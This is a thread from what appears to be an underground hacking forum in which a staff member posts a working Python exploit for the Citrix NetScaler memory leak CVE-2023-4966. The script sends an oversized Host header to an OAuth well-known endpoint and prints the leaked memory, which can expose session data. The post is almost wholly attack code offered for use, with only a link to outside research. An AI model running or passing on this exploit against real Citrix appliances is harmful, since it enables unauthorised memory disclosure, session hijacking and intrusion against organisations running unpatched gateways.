Login   Register
Upgrade your account to access Premium section
Access to DarkForums Private Archive Telegram Channel

Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
1468Citrix | CVE-2023-4966

Original Poster
AnonOne

936
REP
24
LIKES

DarkForums Operative
Admin
Joined: Nov 2022
Threads: 384
Posts: 400
Credits: 5065.00 [+]
2 Years

RecruiterVerified SellerInstagram

STAFF TEAM
#1
04-11-23, 07:46 AM
Citrix | CVE-2023-4966

Info: https://www.assetnote.io/resources/resea...-2023-4966

exploit:
 
Code:
#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
args = parser.parse_args()

if args.target is None:
    print('Target must be provided (e.g. --target 192.168.1.200)')
    sys.exit(0)

hostname = args.target

if __name__ == "__main__":
    headers = {
        "Host": "a"*24576
    }
    r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
    if r.status_code == 200:
        print("--- Dumped Memory ---")
        print(r.text[131050:])
        print("---      End      ---")
    else:
        print("Could not dump memory")
 HELPFUL LINKS

Reply to this thread




Extras

Changelog

Awards

Credits

BanLists

Canary

Account

Control Panel

Upgrade

2 Factor Authentication

Useful Links

Rules & Guidelines

Advertising

Team

Contact Us

ABOUT US

DarkForums is a discussion forum about gaming, technology and various other interesting topics with lots of exclusive leaks.
If you would like to contact the staff team, please send one of our staff members a message or Contact Us .